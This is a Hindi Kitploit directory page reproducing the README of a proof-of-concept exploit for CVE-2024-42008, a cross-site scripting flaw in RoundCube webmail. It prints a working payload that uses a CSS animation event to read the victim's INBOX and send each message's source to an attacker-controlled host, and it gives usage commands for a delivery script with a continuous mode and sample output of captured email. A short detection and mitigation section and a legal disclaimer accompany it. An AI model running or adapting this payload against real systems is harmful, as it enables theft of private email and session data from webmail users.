Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Roundcube-CVE-2024-42008-POC — CVE-2024-42008 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, RoundCube वेबमेल में एक क्रॉस-साइट स्क्रिप्टिंग भेद्यता। अधिकृत पेनिट्रेशन टेस्टिंग वातावरण में ईमेल, क्रेडेंशियल्स और सत्र टोकन चुराने के लिए संपर्क फॉर्म के माध्यम से XSS पेलोड वितरित करता है। | Kitploit
उपकरण/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफिशिंगCTFलर्निंग और शिक्षा
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

CVE-2024-42008 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, RoundCube वेबमेल में एक क्रॉस-साइट स्क्रिप्टिंग भेद्यता। अधिकृत पेनिट्रेशन टेस्टिंग वातावरण में ईमेल, क्रेडेंशियल्स और सत्र टोकन चुराने के लिए संपर्क फॉर्म के माध्यम से XSS पेलोड वितरित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

CVE-2024-42008 RoundCube XSS शोषण

अवलोकन

इस रिपॉजिटरी में CVE-2024-42008 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण शामिल है, जो RoundCube वेबमेल एप्लिकेशन में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है। यह शोषण शैक्षिक उद्देश्यों और HackTheBox जैसे नियंत्रित पैठ परीक्षण वातावरण के लिए डिज़ाइन किया गया है।

भेद्यता विवरण

CVE-2024-42008 सारांश

  • CVE ID: CVE-2024-42008
  • प्रकार: क्रॉस-साइट स्क्रिप्टिंग (XSS)
  • CVSS स्कोर: उच्च
  • प्रभावित संस्करण:
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • फिक्स्ड संस्करण: 1.5.8, 1.6.8+

तकनीकी विवरण

भेद्यता rcmail_action_mail_get->run() में मौजूद है और दूरस्थ हमलावरों को पीड़ितों के ब्राउज़र में मनमाना जावास्क्रिप्ट निष्पादित करने की अनुमति देती है। यह दोष ईमेल सामग्री को संसाधित करते समय अपर्याप्त इनपुट सत्यापन से उत्पन्न होता है, विशेष रूप से CSS एनिमेशन और जावास्क्रिप्ट निष्पादन संदर्भों को संभालने में।

मुख्य हमला वेक्टर:

  • संपर्क फ़ॉर्म या ईमेल संदेशों के माध्यम से इंजेक्ट की गई दुर्भावनापूर्ण HTML सामग्री
  • जावास्क्रिप्ट निष्पादन को ट्रिगर करने के लिए उपयोग किए जाने वाले CSS एनिमेशन गुण
  • onanimationstart इवेंट हैंडलर सामग्री फ़िल्टर को बायपास करते हैं
  • जावास्क्रिप्ट पेलोड वेबमेल एप्लिकेशन के संदर्भ में निष्पादित होता है

प्रभाव

सफल शोषण हमलावरों को अनुमति देता है:

  • पीड़ित के ईमेल चुराना INBOX और अन्य फ़ोल्डरों से
  • ईमेल मेटाडेटा निकालना (UID, संदेश सूचियाँ)
  • ईमेल स्रोत कोड और अटैचमेंट तक पहुँच प्राप्त करना
  • पीड़ित के खाते से ईमेल भेजना
  • लॉगिन क्रेडेंशियल्स और सत्र टोकन प्राप्त करना
  • पीड़ित की ओर से कार्रवाई करना

शोषण स्क्रिप्ट विश्लेषण

स्क्रिप्ट आर्किटेक्चर

शोषण में तीन मुख्य घटक होते हैं:

  1. XSS पेलोड वितरण: संपर्क फ़ॉर्म के माध्यम से दुर्भावनापूर्ण HTML भेजता है
  2. HTTP सर्वर: निकाले गए डेटा को सुनता है
  3. डेटा प्रसंस्करण: चुराए गए ईमेल को कैप्चर और लॉग करता है

पेलोड विवरण

root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">

मुख्य विशेषताएँ

  • निरंतर संचालन: नियमित अंतराल पर पेलोड भेज सकता है
  • स्टील्थ मोड: न्यूनतम पदचिह्न और त्रुटि प्रबंधन
  • डेटा लॉगिंग: निकाले गए ईमेल का स्वचालित कैप्चर और भंडारण
  • डीबग मोड: ट्रैफ़िक विश्लेषण के लिए प्रॉक्सी समर्थन
  • कॉन्फ़िगरेबल: कई कमांड-लाइन विकल्प

उपयोग

पूर्वापेक्षाएँ

root@kitploit:~
pip install requests

मूल उपयोग

root@kitploit:~
# Single payload delivery
python cve-2024-42008-exploit.py

# Continuous mode (every 30 seconds)
python cve-2024-42008-exploit.py -c

# Custom interval (every 60 seconds)
python cve-2024-42008-exploit.py -c -i 60

# Debug mode with proxy
python cve-2024-42008-exploit.py -d

कॉन्फ़िगरेशन

स्क्रिप्ट को कॉन्फ़िगर करने के लिए संपादित करें:

  • ATTACKER_IP: आपका सुनने वाला सर्वर IP
  • ATTACKER_PORT: निकाले गए डेटा प्राप्त करने के लिए पोर्ट
  • RECIPIENT_EMAIL: लक्ष्य ईमेल पता
  • TARGET_URL: कमजोर RoundCube इंस्टेंस
  • PROXY: डीबगिंग के लिए प्रॉक्सी सर्वर (Burp Suite/Caido)

कमांड लाइन विकल्प

विकल्पविवरण
-d, --debugप्रॉक्सी समर्थन के साथ डीबग मोड सक्षम करें
-c, --continuousपेलोड लगातार भेजें
-i, --intervalपेलोड के बीच अंतराल (डिफ़ॉल्ट: 30s)

हमला प्रवाह

  1. पेलोड इंजेक्शन: स्क्रिप्ट संपर्क फ़ॉर्म के माध्यम से दुर्भावनापूर्ण HTML भेजती है
  2. ईमेल वितरण: कमजोर RoundCube ईमेल को संसाधित और वितरित करता है
  3. पीड़ित संपर्क: उपयोगकर्ता दुर्भावनापूर्ण ईमेल खोलता/देखता है
  4. XSS निष्पादन: CSS एनिमेशन जावास्क्रिप्ट पेलोड को ट्रिगर करता है
  5. डेटा निष्कासन: जावास्क्रिप्ट ईमेल चुराता है और हमलावर को भेजता है
  6. डेटा कैप्चर: शोषण सर्वर चुराए गए डेटा को प्राप्त और लॉग करता है

पहचान और शमन

रक्षकों के लिए

पहचान संकेतक:

  • ईमेल सामग्री में असामान्य CSS एनिमेशन गुण
  • HTML में onanimationstart इवेंट हैंडलर
  • ईमेल संदेशों में संदिग्ध जावास्क्रिप्ट
  • वेबमेल से अज्ञात डोमेन पर आउटबाउंड अनुरोध
  • बार-बार संपर्क फ़ॉर्म सबमिशन

शमन रणनीतियाँ:

  • RoundCube को संस्करण 1.5.8 या 1.6.8+ में अपडेट करें
  • सामग्री सुरक्षा नीति (CSP) लागू करें
  • ईमेल सामग्री फ़िल्टरिंग सक्षम करें
  • संदिग्ध आउटबाउंड ट्रैफ़िक की निगरानी करें
  • वेबमेल कॉन्फ़िगरेशन का नियमित सुरक्षा ऑडिट

पैठ परीक्षकों के लिए

परीक्षण संबंधी विचार:

  • परीक्षण से पहले उचित प्राधिकरण सुनिश्चित करें
  • रिपोर्टिंग के लिए सभी गतिविधियों का दस्तावेज़ीकरण करें
  • केवल पृथक वातावरण में परीक्षण करें
  • सत्यापित करें कि लक्ष्य जानबूझकर कमजोर है
  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें

कानूनी और नैतिक विचार

⚠️ चेतावनी: यह शोषण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

  • केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
  • HackTheBox और समान शिक्षण प्लेटफार्मों के लिए डिज़ाइन किया गया
  • अनधिकृत उपयोग स्थानीय और अंतर्राष्ट्रीय कानूनों का उल्लंघन कर सकता है
  • हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
  • गोपनीयता और डेटा सुरक्षा नियमों का सम्मान करें

तकनीकी संदर्भ

  • CVE-2024-42008 आधिकारिक प्रविष्टि
  • RoundCube सुरक्षा सलाहकार
  • CWE-79: क्रॉस-साइट स्क्रिप्टिंग

आउटपुट उदाहरण

root@kitploit:~
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log

अस्वीकरण

यह कोड केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए प्रदान किया गया है। इस सॉफ़्टवेयर के दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं हैं। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास उचित प्राधिकरण है।

टूल डाउनलोड करें